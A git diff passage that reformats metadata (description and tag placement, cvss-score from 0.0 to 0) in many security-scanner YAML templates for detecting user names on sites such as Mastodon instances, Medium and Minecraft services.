CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,mastodon-eu-voice metadata: max-request: 1 + tags: osint,osint-social,mastodon-eu-voice self-contained: true + http: - method: GET path: diff --git a/http/osint/mastodon-mastodon.yaml b/http/osint/mastodon-mastodon.yaml index 0864b8b360..c132aad235 100644 --- a/http/osint/mastodon-mastodon.yaml +++ b/http/osint/mastodon-mastodon.yaml @@ -3,17 +3,18 @@ id: mastodon-mastodon info: name: Mastodon-mastodon User Name Information - Detect author: dwisiswant0 - description: Mastodon-mastodon user name information check was conducted. severity: info + description: Mastodon-mastodon user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,mastodon-mastodon metadata: max-request: 1 + tags: osint,osint-social,mastodon-mastodon self-contained: true + http: - method: GET path: diff --git a/http/osint/mastodon-meowsocial.yaml b/http/osint/mastodon-meowsocial.yaml index 88e96b469a..2510533e70 100644 --- a/http/osint/mastodon-meowsocial.yaml +++ b/http/osint/mastodon-meowsocial.yaml @@ -3,17 +3,18 @@ id: mastodon-meowsocial info: name: Mastodon-meow.social User Name Information - Detect author: dwisiswant0 - description: Mastodon-meow.social user name information check was conducted. severity: info + description: Mastodon-meow.social user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,mastodon-meowsocial metadata: max-request: 1 + tags: osint,osint-social,mastodon-meowsocial self-contained: true + http: - method: GET path: diff --git a/http/osint/mastodon-mstdnio.yaml b/http/osint/mastodon-mstdnio.yaml index 0a062852e3..8b12329d99 100644 --- a/http/osint/mastodon-mstdnio.yaml +++ b/http/osint/mastodon-mstdnio.yaml @@ -3,17 +3,18 @@ id: mastodon-mstdnio info: name: Mastodon-mstdn.io User Name Information - Detect author: dwisiswant0 - description: Mastodon-mstdn.io user name information check was conducted. severity: info + description: Mastodon-mstdn.io user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,mastodon-mstdnio metadata: max-request: 1 + tags: osint,osint-social,mastodon-mstdnio self-contained: true + http: - method: GET path: diff --git a/http/osint/mastodon-polsocial.yaml b/http/osint/mastodon-polsocial.yaml index 9313d62ee7..1cc00c8e2e 100644 --- a/http/osint/mastodon-polsocial.yaml +++ b/http/osint/mastodon-polsocial.yaml @@ -3,17 +3,18 @@ id: mastodon-polsocial info: name: Mastodon-pol.social User Name Information - Detect author: dwisiswant0 - description: Mastodon-pol.social user name information check was conducted. severity: info + description: Mastodon-pol.social user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,mastodon-polsocial metadata: max-request: 1 + tags: osint,osint-social,mastodon-polsocial self-contained: true + http: - method: GET path: diff --git a/http/osint/mastodon-rigczclub.yaml b/http/osint/mastodon-rigczclub.yaml index 81aa49c28c..f159ffe21c 100644 --- a/http/osint/mastodon-rigczclub.yaml +++ b/http/osint/mastodon-rigczclub.yaml @@ -3,17 +3,18 @@ id: mastodon-rigczclub info: name: Mastodon-rigcz.club User Name Information - Detect author: dwisiswant0 - description: Mastodon-rigcz.club user name information check was conducted. severity: info + description: Mastodon-rigcz.club user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,mastodon-rigczclub metadata: max-request: 1 + tags: osint,osint-social,mastodon-rigczclub self-contained: true + http: - method: GET path: diff --git a/http/osint/mastodon-social-tchncs.yaml b/http/osint/mastodon-social-tchncs.yaml index 95036dfc0f..7dfc4f3755 100644 --- a/http/osint/mastodon-social-tchncs.yaml +++ b/http/osint/mastodon-social-tchncs.yaml @@ -3,17 +3,18 @@ id: mastodon-social-tchncs info: name: Mastodon-social tchncs User Name Information - Detect author: dwisiswant0 - description: Mastodon-social tchncs user name information check was conducted. severity: info + description: Mastodon-social tchncs user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,mastodon-social-tchncs metadata: max-request: 1 + tags: osint,osint-social,mastodon-social-tchncs self-contained: true + http: - method: GET path: diff --git a/http/osint/mastodon-tflnetpl.yaml b/http/osint/mastodon-tflnetpl.yaml index 5c48915d93..4d12185cf7 100644 --- a/http/osint/mastodon-tflnetpl.yaml +++ b/http/osint/mastodon-tflnetpl.yaml @@ -3,17 +3,18 @@ id: mastodon-tflnetpl info: name: Mastodon-tfl.net.pl User Name Information - Detect author: dwisiswant0 - description: Mastodon-tfl.net.pl user name information check was conducted. severity: info + description: Mastodon-tfl.net.pl user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,mastodon-tflnetpl metadata: max-request: 1 + tags: osint,osint-social,mastodon-tflnetpl self-contained: true + http: - method: GET path: diff --git a/http/osint/mastodon-tootcommunity.yaml b/http/osint/mastodon-tootcommunity.yaml index 2d42a3bc2b..7a505b1f5e 100644 --- a/http/osint/mastodon-tootcommunity.yaml +++ b/http/osint/mastodon-tootcommunity.yaml @@ -3,17 +3,18 @@ id: mastodon-tootcommunity info: name: Mastodon-Toot.Community User Name Information - Detect author: dwisiswant0 - description: Mastodon-Toot.Community user name information check was conducted. severity: info + description: Mastodon-Toot.Community user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,mastodon-tootcommunity metadata: max-request: 1 + tags: osint,osint-social,mastodon-tootcommunity self-contained: true + http: - method: GET path: diff --git a/http/osint/mastodonbooksnet-mastodon-instance.yaml b/http/osint/mastodonbooksnet-mastodon-instance.yaml index 47befc2899..acec507e37 100644 --- a/http/osint/mastodonbooksnet-mastodon-instance.yaml +++ b/http/osint/mastodonbooksnet-mastodon-instance.yaml @@ -3,17 +3,18 @@ id: mastodonbooksnet-mastodon-instance info: name: Mastodonbooks.net (Mastodon Instance) User Name Information - Detect author: dwisiswant0 - description: Mastodonbooks.net (Mastodon Instance) user name information check was conducted. severity: info + description: Mastodonbooks.net (Mastodon Instance) user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,mastodonbooksnet-mastodon-instance metadata: max-request: 1 + tags: osint,osint-social,mastodonbooksnet-mastodon-instance self-contained: true + http: - method: GET path: diff --git a/http/osint/mastodonchasedemdev-mastodon-instance.yaml b/http/osint/mastodonchasedemdev-mastodon-instance.yaml index 587979fc66..ee742d3fab 100644 --- a/http/osint/mastodonchasedemdev-mastodon-instance.yaml +++ b/http/osint/mastodonchasedemdev-mastodon-instance.yaml @@ -3,17 +3,18 @@ id: mastodonchasedemdev-mastodon-instance info: name: Mastodon.chasedem.dev (Mastodon Instance) User Name Information - Detect author: dwisiswant0 - description: Mastodon.chasedem.dev (Mastodon Instance) user name information check was conducted. severity: info + description: Mastodon.chasedem.dev (Mastodon Instance) user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,mastodonchasedemdev-mastodon-instance metadata: max-request: 1 + tags: osint,osint-social,mastodonchasedemdev-mastodon-instance self-contained: true + http: - method: GET path: diff --git a/http/osint/mastodononline.yaml b/http/osint/mastodononline.yaml index 3ab1e5d46e..ae49308553 100644 --- a/http/osint/mastodononline.yaml +++ b/http/osint/mastodononline.yaml @@ -3,17 +3,18 @@ id: mastodononline info: name: Mastodon.online User Name Information - Detect author: dwisiswant0 - description: Mastodon.online user name information check was conducted. severity: info + description: Mastodon.online user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,mastodononline metadata: max-request: 1 + tags: osint,osint-social,mastodononline self-contained: true + http: - method: GET path: diff --git a/http/osint/mastonyc-mastodon-instance.yaml b/http/osint/mastonyc-mastodon-instance.yaml index 50f0917f83..8cc23365bf 100644 --- a/http/osint/mastonyc-mastodon-instance.yaml +++ b/http/osint/mastonyc-mastodon-instance.yaml @@ -3,17 +3,18 @@ id: mastonyc-mastodon-instance info: name: Masto.nyc (Mastodon Instance) User Name Information - Detect author: dwisiswant0 - description: Masto.nyc (Mastodon Instance) user name information check was conducted. severity: info + description: Masto.nyc (Mastodon Instance) user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,mastonyc-mastodon-instance metadata: max-request: 1 + tags: osint,osint-social,mastonyc-mastodon-instance self-contained: true + http: - method: GET path: diff --git a/http/osint/mastown-mastodon-instance.yaml b/http/osint/mastown-mastodon-instance.yaml index 6d9973a24f..7175fb00a5 100644 --- a/http/osint/mastown-mastodon-instance.yaml +++ b/http/osint/mastown-mastodon-instance.yaml @@ -3,17 +3,18 @@ id: mastown-mastodon-instance info: name: Mas.town (Mastodon Instance) User Name Information - Detect author: dwisiswant0 - description: Mas.town (Mastodon Instance) user name information check was conducted. severity: info + description: Mas.town (Mastodon Instance) user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,mastown-mastodon-instance metadata: max-request: 1 + tags: osint,osint-social,mastown-mastodon-instance self-contained: true + http: - method: GET path: diff --git a/http/osint/mcname-minecraft.yaml b/http/osint/mcname-minecraft.yaml index 86e98c45f4..d28b2f0b46 100644 --- a/http/osint/mcname-minecraft.yaml +++ b/http/osint/mcname-minecraft.yaml @@ -3,17 +3,18 @@ id: mcname-minecraft info: name: MCName (Minecraft) User Name Information - Detect author: dwisiswant0 - description: MCName (Minecraft) user name information check was conducted. severity: info + description: MCName (Minecraft) user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-gaming,mcname-minecraft metadata: max-request: 1 + tags: osint,osint-gaming,mcname-minecraft self-contained: true + http: - method: GET path: diff --git a/http/osint/mcuuid-minecraft.yaml b/http/osint/mcuuid-minecraft.yaml index ec98a2e390..aeea31b68a 100644 --- a/http/osint/mcuuid-minecraft.yaml +++ b/http/osint/mcuuid-minecraft.yaml @@ -3,17 +3,18 @@ id: mcuuid-minecraft info: name: MCUUID (Minecraft) User Name Information - Detect author: dwisiswant0 - description: MCUUID (Minecraft) user name information check was conducted. severity: info + description: MCUUID (Minecraft) user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-gaming,mcuuid-minecraft metadata: max-request: 1 + tags: osint,osint-gaming,mcuuid-minecraft self-contained: true + http: - method: GET path: diff --git a/http/osint/mediakits.yaml b/http/osint/mediakits.yaml index e1ecb81c3e..862979e058 100644 --- a/http/osint/mediakits.yaml +++ b/http/osint/mediakits.yaml @@ -3,17 +3,18 @@ id: mediakits info: name: Mediakits User Name Information - Detect author: dwisiswant0 - description: Mediakits user name information check was conducted. severity: info + description: Mediakits user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,mediakits metadata: max-request: 1 + tags: osint,osint-social,mediakits self-contained: true + http: - method: GET path: diff --git a/http/osint/medium.yaml b/http/osint/medium.yaml index d2ddb58bad..dc5afe4d36 100644 --- a/http/osint/medium.yaml +++ b/http/osint/medium.yaml @@ -3,17 +3,18 @@ id: medium info: name: Medium User Name Information - Detect author: dwisiswant0 - description: Medium user name information check was conducted. severity: info + description: Medium user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,medium metadata: max-request: 1 + tags: osint,osint-social,medium self-contained: true + http: - method: GET path: diff --git a/http/osint/medyczkapl.yaml b/http/osint/medyczkapl.yaml index eb0b06e277..861619adbf 100644 --- a/http/osint/medyczkapl.yaml +++ b/http/osint/medyczkapl.yaml @@ -3,17 +3,18 @@ id: medyczkapl info: name: Medyczka.pl User Name Information - Detect author: dwisiswant0 - description: Medyczka.pl user name information check was conducted. severity: info + description: Medyczka.pl user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-health,medyczkapl metadata: max-request: 1 + tags: osint,osint-health,medyczkapl self-contained: true + http: - method: GET path: diff --git a/http/osint/meet-me.yaml b/http/osint/meet-me.yaml index 190d6aca81..e8158cc6c5 100644 --- a/http/osint/meet-me.yaml +++ b/http/osint/meet-me.yaml @@ -3,17 +3,18 @@ id: meet-me info: name: Meet me User Name Information - Detect author: dwisiswant0 - description: Meet me user name information check was conducted. severity: info + description: Meet me user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-dating,meet-me metadata: max-request: 1 + tags: osint,osint-dating,meet-me self-contained: true + http: - method: GET path: diff --git a/http/osint/megamodelspl.yaml b/http/osint/megamodelspl.yaml index 1047af7972..6d0f9e91d6 100644 --- a/http/osint/megamodelspl.yaml +++ b/http/osint/megamodelspl.yaml @@ -3,17 +3,18 @@ id: megamodelspl info: name: Megamodels.pl User Name Information - Detect author: dwisiswant0 - description: Megamodels.pl user name information check was conducted. severity: info + description: Megamodels.pl user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,megamodelspl metadata: max-request: 1 + tags: osint,osint-social,megamodelspl self-contained: true + http: - method: GET path: diff --git a/http/osint/memrise.yaml b/http/osint/memrise.yaml index 2fa6d2b10b..6b5c1c193f 100644 --- a/http/osint/memrise.yaml +++ b/http/osint/memrise.yaml @@ -3,17 +3,18 @@ id: memrise info: name: Memrise User Name Information - Detect author: dwisiswant0 - description: Memrise user name information check was conducted. severity: info + description: Memrise user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-hobby,memrise metadata: max-request: 1 + tags: osint,osint-hobby,memrise self-contained: true + http: - method: GET path: diff --git a/http/osint/message-me.yaml b/http/osint/message-me.yaml index 62a4e2a2b4..d5dabc944c 100644 --- a/http/osint/message-me.yaml +++ b/http/osint/message-me.yaml @@ -3,17 +3,18 @@ id: message-me info: name: Message me User Name Information - Detect author: dwisiswant0 - description: Message me user name information check was conducted. severity: info + description: Message me user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,message-me metadata: max-request: 1 + tags: osint,osint-social,message-me self-contained: true + http: - method: GET path: diff --git a/http/osint/metacritic.yaml b/http/osint/metacritic.yaml index e373f4749c..bc817f0f6f 100644 --- a/http/osint/metacritic.yaml +++ b/http/osint/metacritic.yaml @@ -3,17 +3,18 @@ id: metacritic info: name: Metacritic User Name Information - Detect author: dwisiswant0 - description: Metacritic user name information check was conducted. severity: info + description: Metacritic user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-hobby,metacritic metadata: max-request: 1 + tags: osint,osint-hobby,metacritic self-contained: true + http: - method: GET path: diff --git a/http/osint/microsoft-technet-community.yaml b/http/osint/microsoft-technet-community.yaml index 2d4088ccf3..7d8b634746 100644 --- a/http/osint/microsoft-technet-community.yaml +++ b/http/osint/microsoft-technet-community.yaml @@ -3,17 +3,18 @@ id: microsoft-technet-community info: name: Microsoft Technet Community User Name Information - Detect author: dwisiswant0 - description: Microsoft Technet Community user name information check was conducted. severity: info + description: Microsoft Technet Community user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-tech,microsoft-technet-community metadata: max-request: 1 + tags: osint,osint-tech,microsoft-technet-community self-contained: true + http: - method: GET path: diff --git a/http/osint/minds.yaml b/http/osint/minds.yaml index a2bd79ef55..0256fc0af8 100644 --- a/http/osint/minds.yaml +++ b/http/osint/minds.yaml @@ -3,17 +3,18 @@ id: minds info: name: Minds User Name Information - Detect author: dwisiswant0 - description: Minds user name information check was conducted. severity: info + description: Minds user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-political,minds metadata: max-request: 1 + tags: osint,osint-political,minds self-contained: true + http: - method: GET path: diff --git a/http/osint/minecraft-list.yaml b/http/osint/minecraft-list.yaml index 71b3a3fe90..a623151b7b 100644 --- a/http/osint/minecraft-list.yaml +++ b/http/osint/minecraft-list.yaml @@ -3,17 +3,18 @@ id: minecraft-list info: name: Minecraft List User Name Information - Detect author: dwisiswant0 - description: Minecraft List user name information check was conducted. severity: info + description: Minecraft List user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-gaming,minecraft-list metadata: max-request: 1 + tags: osint,osint-gaming,minecraft-list self-contained: true + http: - method: GET path: diff --git a/http/osint/mintme.yaml b/http/osint/mintme.yaml index bc52c9ab18..ed08e7cbfe 100644 --- a/http/osint/mintme.yaml +++ b/http/osint/mintme.yaml @@ -3,17 +3,18 @@ id: mintme info: name: Mintme User Name Information - Detect author: dwisiswant0 - description: Mintme user name information check was conducted. severity: info + description: Mintme user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-finance,mintme metadata: max-request: 1 + tags: osint,osint-finance,mintme self-contained: true + http: - method: GET path: diff --git a/http/osint/mistrzowie.yaml b/http/osint/mistrzowie.yaml index a9a11cbd1f..0f2632bf2b 100644 --- a/http/osint/mistrzowie.yaml +++ b/http/osint/mistrzowie.yaml @@ -3,17 +3,18 @@ id: mistrzowie info: name: Mistrzowie User Name Information - Detect author: dwisiswant0 - description: Mistrzowie user name information check was conducted. severity: info + description: Mistrzowie user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-images,mistrzowie metadata: max-request: 1 + tags: osint,osint-images,mistrzowie self-contained: true + http: - method: GET path: diff --git a/http/osint/mix.yaml b/http/osint/mix.yaml index bc4ef416c0..42c960cb01 100644 --- a/http/osint/mix.yaml +++ b/http/osint/mix.yaml @@ -3,17 +3,18 @@ id: mix info: name: Mix User Name Information - Detect author: dwisiswant0 - description: Mix user name information check was conducted. severity: info + description: Mix user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,mix metadata: max-request: 1 + tags: osint,osint-social,mix self-contained: true + http: - method: GET path: diff --git a/http/osint/mixi.yaml b/http/osint/mixi.yaml index 9abe7e5fbd..77f90ca9b2 100644 --- a/http/osint/mixi.yaml +++ b/http/osint/mixi.yaml @@ -3,17 +3,18 @@ id: mixi info: name: Mixi User Name Information - Detect author: dwisiswant0 - description: Mixi user name information check was conducted. severity: info + description: Mixi user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,mixi metadata: max-request: 1 + tags: osint,osint-social,mixi self-contained: true + http: - method: GET path: diff --git a/http/osint/mixlr.yaml b/http/osint/mixlr.yaml index 654a15f9a1..0c7d43ef06 100644 --- a/http/osint/mixlr.yaml +++ b/http/osint/mixlr.yaml @@ -3,17 +3,18 @@ id: mixlr info: name: Mixlr User Name Information - Detect author: dwisiswant0 - description: Mixlr user name information check was conducted. severity: info + description: Mixlr user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-music,mixlr metadata: max-request: 1 + tags: osint,osint-music,mixlr self-contained: true + http: - method: GET path: diff --git a/http/osint/mmorpg.yaml b/http/osint/mmorpg.yaml index 22c1350b32..f8bd309296 100644 --- a/http/osint/mmorpg.yaml +++ b/http/osint/mmorpg.yaml @@ -3,17 +3,18 @@ id: mmorpg info: name: Mmorpg User Name Information - Detect author: dwisiswant0 - description: Mmorpg user name information check was conducted. severity: info + description: Mmorpg user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-gaming,mmorpg metadata: max-request: 1 + tags: osint,osint-gaming,mmorpg self-contained: true + http: - method: GET path: diff --git a/http/osint/mod-db.yaml b/http/osint/mod-db.yaml index b4399d3b9c..03377f8468 100644 --- a/http/osint/mod-db.yaml +++ b/http/osint/mod-db.yaml @@ -7,13 +7,14 @@ info: description: Mod DB user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-gaming,mod-db metadata: max-request: 1 + tags: osint,osint-gaming,mod-db self-contained: true + http: - method: GET path: diff --git a/http/osint/moneysavingexpert.yaml b/http/osint/moneysavingexpert.yaml index 8b192bc372..46eedac7d6 100644 --- a/http/osint/moneysavingexpert.yaml +++ b/http/osint/moneysavingexpert.yaml @@ -3,17 +3,18 @@ id: moneysavingexpert info: name: Moneysavingexpert User Name Information - Detect author: dwisiswant0 - description: Moneysavingexpert user name information check was conducted. severity: info + description: Moneysavingexpert user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-finance,moneysavingexpert metadata: max-request: 1 + tags: osint,osint-finance,moneysavingexpert self-contained: true + http: - method: GET path: diff --git a/http/osint/motokiller.yaml b/http/osint/motokiller.yaml index c001bf0df3..ab6c7ceebc 100644 --- a/http/osint/motokiller.yaml +++ b/http/osint/motokiller.yaml @@ -3,17 +3,18 @@ id: motokiller info: name: Motokiller User Name Information - Detect author: dwisiswant0 - description: Motokiller user name information check was conducted. severity: info + description: Motokiller user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-images,motokiller metadata: max-request: 1 + tags: osint,osint-images,motokiller self-contained: true + http: - method: GET path: diff --git a/http/osint/moxfield.yaml b/http/osint/moxfield.yaml index e63ae6c36d..aa07b01dc0 100644 --- a/http/osint/moxfield.yaml +++ b/http/osint/moxfield.yaml @@ -3,17 +3,18 @@ id: moxfield info: name: Moxfield User Name Information - Detect author: dwisiswant0 - description: Moxfield user name information check was conducted. severity: info + description: Moxfield user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-misc,moxfield metadata: max-request: 1 + tags: osint,osint-misc,moxfield self-contained: true + http: - method: GET path: diff --git a/http/osint/muck-rack.yaml b/http/osint/muck-rack.yaml index 629ad3c9f5..52b4d6623e 100644 --- a/http/osint/muck-rack.yaml +++ b/http/osint/muck-rack.yaml @@ -3,17 +3,18 @@ id: muck-rack info: name: Muck Rack User Name Information - Detect author: dwisiswant0 - description: Muck Rack user name information check was conducted. severity: info + description: Muck Rack user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-news,muck-rack metadata: max-request: 1 + tags: osint,osint-news,muck-rack self-contained: true + http: - method: GET path: diff --git a/http/osint/musiciansocial-mastodon-instance.yaml b/http/osint/musiciansocial-mastodon-instance.yaml index 5d7765e5d1..4cdcd4068b 100644 --- a/http/osint/musiciansocial-mastodon-instance.yaml +++ b/http/osint/musiciansocial-mastodon-instance.yaml @@ -3,17 +3,18 @@ id: musiciansocial-mastodon-instance info: name: Musician.social (Mastodon Instance) User Name Information - Detect author: dwisiswant0 - description: Musician.social (Mastodon Instance) user name information check was conducted. severity: info + description: Musician.social (Mastodon Instance) user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,musiciansocial-mastodon-instance metadata: max-request: 1 + tags: osint,osint-social,musiciansocial-mastodon-instance self-contained: true + http: - method: GET path: diff --git a/http/osint/musictraveler.yaml b/http/osint/musictraveler.yaml index 1d352b2cb7..34322d4730 100644 --- a/http/osint/musictraveler.yaml +++ b/http/osint/musictraveler.yaml @@ -3,17 +3,18 @@ id: musictraveler info: name: Musictraveler User Name Information - Detect author: dwisiswant0 - description: Musictraveler user name information check was conducted. severity: info + description: Musictraveler user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-music,musictraveler metadata: max-request: 1 + tags: osint,osint-music,musictraveler self-contained: true + http: - method: GET path: diff --git a/http/osint/my-instants.yaml b/http/osint/my-instants.yaml index 97ccc201d8..6d7f341b5d 100644 --- a/http/osint/my-instants.yaml +++ b/http/osint/my-instants.yaml @@ -3,17 +3,18 @@ id: my-instants info: name: My instants User Name Information - Detect author: dwisiswant0 - description: My instants user name information check was conducted. severity: info + description: My instants user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-music,my-instants metadata: max-request: 1 + tags: osint,osint-music,my-instants self-contained: true + http: - method: GET path: diff --git a/http/osint/myanimelist.yaml b/http/osint/myanimelist.yaml index 8f6cf7c3f5..299ab084a6 100644 --- a/http/osint/myanimelist.yaml +++ b/http/osint/myanimelist.yaml @@ -3,17 +3,18 @@ id: myanimelist info: name: MyAnimeList User Name Information - Detect author: dwisiswant0 - description: MyAnimeList user name information check was conducted. severity: info + description: MyAnimeList user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,myanimelist metadata: max-request: 1 + tags: osint,osint-social,myanimelist self-contained: true + http: - method: GET path: diff --git a/http/osint/mybuildercom.yaml b/http/osint/mybuildercom.yaml index 5d755aa3ac..1d5e8c659d 100644 --- a/http/osint/mybuildercom.yaml +++ b/http/osint/mybuildercom.yaml @@ -3,17 +3,18 @@ id: mybuildercom info: name: MyBuilder.com User Name Information - Detect author: dwisiswant0 - description: MyBuilder.com user name information check was conducted. severity: info + description: MyBuilder.com user name information check was conducted. classification: cvss-metrics: 